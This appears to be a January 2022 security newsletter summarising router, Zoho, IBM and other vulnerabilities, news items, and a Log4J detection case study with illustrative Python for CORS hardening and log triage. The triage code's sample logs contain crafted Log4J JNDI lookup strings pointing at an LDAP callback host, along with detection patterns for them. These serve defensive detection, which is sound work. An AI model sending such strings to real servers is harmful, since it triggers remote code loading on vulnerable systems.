The LogicHub Security Roundup: January 2022 Edition
Hello, and welcome to the latest edition of the LogicHub Monthly Update! Each month we’ll be covering a broad view of this past month’s threats, a series of informative use cases seen this month by our teams, and a series of recommended articles, podcasts, and other useful resources.
Batch of NETGEAR Vulnerabilities
WHAT DOES IT DO?
NETGEAR routers are popular devices for home use. Alongside the Nighthawk R6700 gaming router, a series of vulnerabilities was found in other versions of NETGEAR router firmware, including mishandling of IEEE 1905 protocols, various remote code execution vulnerabilities, and command injections affecting the device’s update functionality. These vulnerabilities can be found in the National Vulnerability Database.
Many of these flaws are quite severe and should be carefully reviewed by users of NETGEAR routers. Some potential effects can include full device access, data theft, device manipulation, and possible privilege escalation.
Some of these vulnerabilities have been successfully patched, but many affecting the R6700 have not. Additionally, some of the hardware-related vulnerabilities (such as those in MediaTek microchips) may be much more difficult to patch and must instead be mitigated.
Zoho ManageEngine Authentication Bypass
WHAT DOES IT DO?
Zoho ManageEngine is a popular IT management solution used by enterprises for desktop, mobile device, general patching, and other management purposes. In this vulnerability, Zoho ManageEngine Desktop Central is specifically affected by an authentication bypass vulnerability that was seen in active exploitation this past December.
Attackers taking advantage of this vulnerability could gain unintended and unauthorized access to Desktop Central.
Several patches have been released to address this issue as of December 3rd. Users affected are urged to patch immediately.
IBM Spectrum Protect Plus Cross-Origin Resource Sharing
WHAT DOES IT DO?
IBM Spectrum Protect Plus is a popular option for backup and data replication across all manner of data platforms. Cross-origin resource sharing (CORS) uses HTTP headers to let an application load images, scripts, and other elements from other domains. This feature was enabled on Spectrum Protect Plus.
The main problem with cross-origin resource sharing is its lack of predictability. If the outside domain suddenly serves malware and access control is not properly configured (as in this case), that malware will be served inside the requesting application. This can have disastrous effects on users.
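The misconfiguration described above comes down to which Origin values the server accepts. The following added example (illustrative code written for this roundup, not IBM's or Spectrum Protect Plus's implementation) contrasts a weak policy that reflects any requesting origin with a hardened one that exact-matches against an allowlist; the allowlist entries and the `normalise_origin` helper are assumptions for the example.

```python
"""Added example: evaluating a CORS response policy against an origin allowlist.
Illustrative code; not the implementation of any product named in the roundup."""
from typing import Dict, Optional
from urllib.parse import urlsplit

# Constructed allowlist of origins permitted to read this API's responses (assumption).
ALLOWED_ORIGINS = {"https://backup-console.example.com", "https://admin.example.com"}


def weak_cors_headers(origin: str) -> Dict[str, str]:
    """Misconfiguration: reflect whatever Origin the browser sent and allow credentials.
    Any third-party page can then make credentialed requests and read the responses."""
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }


def normalise_origin(origin: str) -> Optional[str]:
    """Return scheme://host[:port] for a syntactically valid origin, else None.
    Rejects 'null', bare hostnames and anything carrying a path."""
    parts = urlsplit(origin)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    if parts.path not in ("", "/") or parts.query or parts.fragment:
        return None
    return f"{parts.scheme}://{parts.netloc.lower()}"


def strict_cors_headers(origin: str) -> Dict[str, str]:
    """Hardened policy: exact-match the normalised Origin against the allowlist.
    Unknown origins get no CORS headers at all, so the browser blocks the read."""
    norm = normalise_origin(origin)
    if norm is None or norm not in ALLOWED_ORIGINS:
        return {}
    return {
        "Access-Control-Allow-Origin": norm,
        "Access-Control-Allow-Credentials": "true",
        # Tell caches the response varies by Origin so one origin's headers
        # are never replayed to another.
        "Vary": "Origin",
    }


if __name__ == "__main__":
    for o in ("https://backup-console.example.com", "https://evil.example.net", "null"):
        print(o, "weak:", weak_cors_headers(o), "strict:", strict_cors_headers(o))
```

Exact matching matters: a suffix or substring check would accept `backup-console.example.com.evil.net`, which the strict policy above rejects because the whole normalised origin must be in the set.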
An issue was discovered in Reprise RLM 14.2. Because /goform/change_password_process does not verify authentication or authorization, an unauthenticated user can change the password of any existing user. This lets an attacker change the password of any known user, thereby locking valid users out of the system and granting the attacker full access to that user's account.
The CLI 1.0.0 for Amazon AWS OpenSearch has weak permissions for the configuration file.
An unauthenticated remote attacker can access mySCADA myPRO Versions 8.20.0 and prior without any form of authentication or authorization.
CUSTOMER USE CASE
Log4J Automation and Response
Log4J was a major exercise in patience for every network admin, security engineer, and response team, and we were certainly no different. Though we faced our own hardships in producing an effective solution for Log4J, we can comfortably speak to some of the difficulties we witnessed. Besides the typical ‘spray and pray’ attempts on random servers across the web, we also witnessed widespread, targeted, pentest-style use of crafted Log4J strings by attackers. Thankfully, thanks to the automation described below, we were able to keep a close eye on clients and maintain an effective security posture.
The first step in any automated solution is to identify the signatures of the problem; in this case, that meant a lot of LDAP activity and successful outbound traffic to the domains requested in crafted strings. The next step is to implement careful monitoring: we chose to link into IP reputation checks, pull logs from different client sources to cross-reference, and create a case or alert upon discovery of a successful data transfer. Finally, the solution has to be tuned to satisfaction, and a lot of tuning against different fuzzing methods was implemented. After assigning scores based on severity and creating the cases, manual triage was performed. The fact that there was a manageable number of cases for our MDR to triage by hand signaled that our automation was (and continues to be) a massive success.
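The pipeline just described (signature, cross-referenced monitoring, severity scoring, case creation) can be sketched end to end. The following is an added example written for this roundup, not LogicHub's automation: the web and firewall log lines, the IP reputation table, the scoring weights and all function names are constructed assumptions. It normalises nested `${lower:...}` lookups before matching so that the obfuscated variants the tuning step refers to are not missed, then cross-references each callback host against the egress log to tell a blocked probe from a successful connection.

```python
"""Added example: a small Log4J triage pipeline over constructed log lines.
Illustrative code written for this roundup; it is not LogicHub's automation."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# --- constructed sample data (assumptions, not real client logs) ------------
WEB_LOGS = [
    # plain JNDI lookup carried in the User-Agent header
    '198.51.100.7 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "${jndi:ldap://203.0.113.10:1389/a}"',
    # nested-lookup obfuscation, which a naive substring match on "${jndi:" misses
    '198.51.100.8 - - [10/Dec/2021:10:02:15 +0000] "GET /login HTTP/1.1" 200 871 "${${lower:j}ndi:ldap://203.0.113.20:1389/x}"',
    # benign request
    '192.0.2.5 - - [10/Dec/2021:10:03:40 +0000] "GET /healthz HTTP/1.1" 200 2 "curl/7.79.1"',
]
# Outbound connection log, e.g. from a firewall. Only the first callback host
# actually received a connection from the application server.
EGRESS_LOGS = [
    "2021-12-10T10:01:03Z src=10.0.0.5 dst=203.0.113.10 dport=1389 proto=tcp action=allow",
    "2021-12-10T10:02:16Z src=10.0.0.5 dst=203.0.113.20 dport=1389 proto=tcp action=deny",
]
# Constructed stand-in for an IP reputation feed.
IP_REPUTATION = {"203.0.113.10": "malicious", "203.0.113.20": "unknown"}

# --- step 1: signature -------------------------------------------------------
NESTED_LOOKUP = re.compile(r"\$\{(?:lower|upper):(\w)\}")
JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://([^:/}]+)(?::(\d+))?", re.IGNORECASE)


def normalise(text: str) -> str:
    """Collapse ${lower:j}/${upper:J} nesting until a fixed point so JNDI can match."""
    prev = None
    while prev != text:
        prev, text = text, NESTED_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def extract_indicators(web_logs: List[str]) -> List[Tuple[str, str, str]]:
    """Return (source_ip, scheme, callback_host) for every line carrying a lookup."""
    hits = []
    for line in web_logs:
        m = JNDI.search(normalise(line))
        if m:
            hits.append((line.split(" ", 1)[0], m.group(1).lower(), m.group(2)))
    return hits


# --- step 2: cross-reference with a second log source -------------------------
def allowed_destinations(egress_logs: List[str]) -> Set[str]:
    """Destinations that actually received an allowed outbound connection."""
    allowed = set()
    for line in egress_logs:
        kv = dict(tok.split("=", 1) for tok in line.split()[1:])
        if kv.get("action") == "allow":
            allowed.add(kv["dst"])
    return allowed


# --- step 3: severity scoring and case creation -------------------------------
@dataclass
class Case:
    src_ip: str
    callback_host: str
    scheme: str
    reputation: str
    egress_succeeded: bool
    score: int


def severity(reputation: str, egress_succeeded: bool) -> int:
    """Constructed weights: any lookup is worth triage; reputation and a
    successful callback each raise the priority."""
    score = 40
    if reputation == "malicious":
        score += 30
    if egress_succeeded:
        score += 30
    return score


def build_cases(web_logs: List[str], egress_logs: List[str],
                reputation: Dict[str, str]) -> List[Case]:
    allowed = allowed_destinations(egress_logs)
    cases = []
    for src, scheme, host in extract_indicators(web_logs):
        rep = reputation.get(host, "unknown")
        ok = host in allowed
        cases.append(Case(src, host, scheme, rep, ok, severity(rep, ok)))
    # highest priority first, so the MDR triage queue starts with confirmed egress
    return sorted(cases, key=lambda c: c.score, reverse=True)


if __name__ == "__main__":
    for case in build_cases(WEB_LOGS, EGRESS_LOGS, IP_REPUTATION):
        print(case)
```

The cross-reference is what separates noise from incidents: both sample requests carried a lookup, but only the one whose callback host appears with `action=allow` in the egress log represents a completed connection, and it is the case that lands at the top of the queue.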
BENEFITS TO THIS APPROACH
As with any automation that addresses a fast-growing problem, there has to be a careful balance between speed and effectiveness. Even then, the time and energy spent producing this automation is minuscule compared to the heavy workload that would have awaited a manual review of every log collector’s Log4J detections, especially without the ability to cross-reference between sources. Because of the speed of this automation, we were able to alert concerned clients to possible malicious attempts in a timely manner.
This section contains some interesting reading related to the state of infosec today. These articles have a simple summary that explains the basic idea of the news and links to more information.
Kronos hit with ransomware, warns of data breach and 'several week' outage
A ransomware attack on the Kronos Private Cloud knocked out several customers’ services, according to a message posted on the Kronos community message board. This caused some waves in the security community, as some companies contracting Kronos would not be able to process their payrolls, among them multiple local governments and enterprises such as Tesla.
Australia's first data strategy to create 'one-stop shop' for accessing government data
Coming on the heels of last month’s concerning security advancements by the Australian government is an attempt to modernize all data access methods for citizens. This has sparked a review into the Australian Privacy Act, which may need some modernization as well. One drawback? The goalposts are rather far, with 2025 being the expected delivery time for the proposed modernization plans and 2030 being the extended goal for updated implementation.
Microsoft December 2021 Patch Tuesday: Zero-day exploited to spread Emotet malware
This was one interesting Patch Tuesday for Microsoft. 67 security fixes were released for Office, Powershell, Edge, Print Spooler, and RDC, accented by six zero-day vulnerabilities (though thankfully only one of these was being exploited in the wild). This being Patch Tuesday, all of these vulnerabilities were addressed in some form.
Researchers Uncover New Coexistence Attacks On Wi-Fi and Bluetooth Chips
Various radios work together to communicate simultaneously on one chip in modern-day smartphones. This mechanism, known as ‘coexistence’, is the target of the latest attack, which can directly pull passwords or observe Bluetooth packets from the Wi-Fi combo chip. Dubbed ‘Spectra’, this idea has been floating around for a while, but is starting to become better formed as a concept. Users are urged to regularly remove unused Wi-Fi networks and Bluetooth pairings, and to use only trusted networks where at all possible.
Microsoft informs customers of 'NotLegit' Azure bug
Discovered in October, the Azure bug affects ‘all PHP, Node, Ruby, and Python applications deployed using Local Git on a clean default application in Azure App Service since September 2017’. Apps from September 2017 onward with any Git source after a file was created or modified in the application container were also affected. Only users of Local Git were impacted.
The Y2K22 bug, dubbed such due to its similarity to Y2K, caused a bit of a panic for Microsoft Exchange server admins. The FIP-FS malware scanner integrated into Exchange 2016 and 2019 stores its date in a 32-bit format. When the year 2022 arrived, the 32-bit format caused issues with date and time validations (much like the ones seen in 2000). Now it’s not just Microsoft, but Honda and SonicWall who are seeing issues: some car owners are seeing their clocks set to 2002, and SonicWall users are unable to access the junk inbox and message logs for incoming or outgoing emails.